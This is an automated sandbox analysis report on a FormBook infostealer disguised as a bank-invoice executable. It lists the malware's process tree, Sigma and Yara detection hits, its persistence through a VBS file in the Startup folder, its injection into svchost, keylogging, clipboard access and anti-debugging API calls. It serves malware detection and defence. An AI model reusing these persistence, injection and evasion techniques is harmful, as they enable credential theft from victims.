Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
confirm bank details invoice.exe

Overview

General Information

Sample name:confirm bank details invoice.exe
Analysis ID:1560108
MD5:aac8fccdea2f379bb5c27edf267427fd
SHA1:e193c96e5d20e5f296fc8bf84145bfdbe8ce1cfc
SHA256:2faacf34e9482cbf4d1b032af7193b4c1ecd419da8377d47e1a307f17b77bc27
Tags:exeuser-TeamDreier
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Drops VBS files to the startup folder
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • confirm bank details invoice.exe (PID: 4332 cmdline: "C:\Users\user\Desktop\confirm bank details invoice.exe" MD5: AAC8FCCDEA2F379BB5C27EDF267427FD)
    • deblaterate.exe (PID: 7112 cmdline: "C:\Users\user\Desktop\confirm bank details invoice.exe" MD5: AAC8FCCDEA2F379BB5C27EDF267427FD)
      • svchost.exe (PID: 4612 cmdline: "C:\Users\user\Desktop\confirm bank details invoice.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • wscript.exe (PID: 4852 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • deblaterate.exe (PID: 1308 cmdline: "C:\Users\user\AppData\Local\Vevina\deblaterate.exe" MD5: AAC8FCCDEA2F379BB5C27EDF267427FD)
      • svchost.exe (PID: 2128 cmdline: "C:\Users\user\AppData\Local\Vevina\deblaterate.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2462871861.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.2352206461.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.2463196003.0000000003160000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000003.00000002.2352898550.0000000003390000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          7.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            3.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              7.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                3.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs" , ProcessId: 4852, ProcessName: wscript.exe
                  Sigma detected: Uncommon Svchost Parent Process
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\confirm bank details invoice.exe", CommandLine: "C:\Users\user\Desktop\confirm bank details invoice.exe", CommandLine|base64offset|contains: m, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\confirm bank details invoice.exe", ParentImage: C:\Users\user\AppData\Local\Vevina\deblaterate.exe, ParentProcessId: 7112, ParentProcessName: deblaterate.exe, ProcessCommandLine: "C:\Users\user\Desktop\confirm bank details invoice.exe", ProcessId: 4612, ProcessName: svchost.exe
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs" , ProcessId: 4852, ProcessName: wscript.exe
                  Sigma detected: Windows Processes Suspicious Parent Directory
                  Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\confirm bank details invoice.exe", CommandLine: "C:\Users\user\Desktop\confirm bank details invoice.exe", CommandLine|base64offset|contains: m, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\confirm bank details invoice.exe", ParentImage: C:\Users\user\AppData\Local\Vevina\deblaterate.exe, ParentProcessId: 7112, ParentProcessName: deblaterate.exe, ProcessCommandLine: "C:\Users\user\Desktop\confirm bank details invoice.exe", ProcessId: 4612, ProcessName: svchost.exe

                  Data Obfuscation

                  barindex
                  Sigma detected: Drops script at startup location
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Vevina\deblaterate.exe, ProcessId: 7112, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs

                  Suricata Signatures

                  No Suricata rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeReversingLabs: Detection: 34%
                  Multi AV Scanner detection for submitted file
                  Source: confirm bank details invoice.exeReversingLabs: Detection: 34%
                  Yara detected FormBook
                  Source: Yara matchFile source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000007.00000002.2462871861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.2352206461.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.2463196003.0000000003160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.2352898550.0000000003390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: confirm bank details invoice.exeJoe Sandbox ML: detected
                  Source: confirm bank details invoice.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: Binary string: wntdll.pdbUGP source: deblaterate.exe, 00000002.00000003.2182122492.00000000040B0000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 00000002.00000003.2181870109.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2296558454.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2352991804.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2294004836.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2352991804.000000000379E000.00000040.00001000.00020000.00000000.sdmp, deblaterate.exe, 00000005.00000003.2314686450.00000000037C0000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 00000005.00000003.2315495745.0000000003620000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2420985063.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2418955435.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2463444014.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2463444014.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: deblaterate.exe, 00000002.00000003.2182122492.00000000040B0000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 00000002.00000003.2181870109.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000003.2296558454.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2352991804.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2294004836.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2352991804.000000000379E000.00000040.00001000.00020000.00000000.sdmp, deblaterate.exe, 00000005.00000003.2314686450.00000000037C0000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 00000005.00000003.2315495745.0000000003620000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2420985063.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2418955435.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2463444014.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2463444014.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004B6CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004B6CA9
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004B60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_004B60DD
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004B63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_004B63F9
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004BEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_004BEB60
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004BF56F FindFirstFileW,FindClose,0_2_004BF56F
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004BF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004BF5FA
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004C1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_004C1B2F
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004C1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_004C1C8A
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004C1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_004C1F94
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D66CA9 GetFileAttributesW,FindFirstFileW,FindClose,2_2_00D66CA9
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D660DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,2_2_00D660DD
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D663F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,2_2_00D663F9
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D6EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00D6EB60
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D6F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_00D6F5FA
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D6F56F FindFirstFileW,FindClose,2_2_00D6F56F
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D71B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00D71B2F
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D71C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00D71C8A
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D71F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00D71F94
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004C4EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_004C4EB5
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004C6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_004C6B0C
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004C6D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_004C6D07
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D76D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_00D76D07
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004C6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_004C6B0C
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004B2B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_004B2B37
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004DF7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_004DF7FF
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D8F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_00D8F7FF

                  E-Banking Fraud

                  barindex
                  Yara detected FormBook
                  Source: Yara matchFile source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000007.00000002.2462871861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.2352206461.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.2463196003.0000000003160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.2352898550.0000000003390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                  System Summary

                  barindex
                  Binary is likely a compiled AutoIt script file
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: This is a third-party compiled AutoIt script.0_2_00473D19
                  Source: confirm bank details invoice.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: confirm bank details invoice.exe, 00000000.00000003.2163668787.0000000003A5D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_8198f41a-1
                  Source: confirm bank details invoice.exe, 00000000.00000003.2163668787.0000000003A5D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_f49c3fab-2
                  Source: confirm bank details invoice.exe, 00000000.00000000.2140619357.000000000051E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_6d469efa-4
                  Source: confirm bank details invoice.exe, 00000000.00000000.2140619357.000000000051E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: JSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_df64b0a4-9
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: This is a third-party compiled AutoIt script.2_2_00D23D19
                  Source: deblaterate.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: deblaterate.exe, 00000002.00000002.2185715713.0000000000DCE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_36d9ed64-6
                  Source: deblaterate.exe, 00000002.00000002.2185715713.0000000000DCE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_712e269f-f
                  Source: deblaterate.exe, 00000005.00000000.2292381951.0000000000DCE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_5d3d2c7a-f
                  Source: deblaterate.exe, 00000005.00000000.2292381951.0000000000DCE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_90dc5791-e
                  Source: confirm bank details invoice.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_b664a442-f
                  Source: confirm bank details invoice.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_5133e0ec-4
                  Source: deblaterate.exe.0.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_7ee01bb6-0
                  Source: deblaterate.exe.0.drString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_44fd17fe-1
                  Initial sample is a PE file and has a suspicious name
                  Source: initial sampleStatic PE information: Filename: confirm bank details invoice.exe
                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0042CB93 NtClose,3_2_0042CB93
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03672B60 NtClose,LdrInitializeThunk,3_2_03672B60
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_03672DF0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036735C0 NtCreateMutant,LdrInitializeThunk,3_2_036735C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03674340 NtSetContextThread,3_2_03674340
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03674650 NtSuspendThread,3_2_03674650
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03672BE0 NtQueryValueKey,3_2_03672BE0
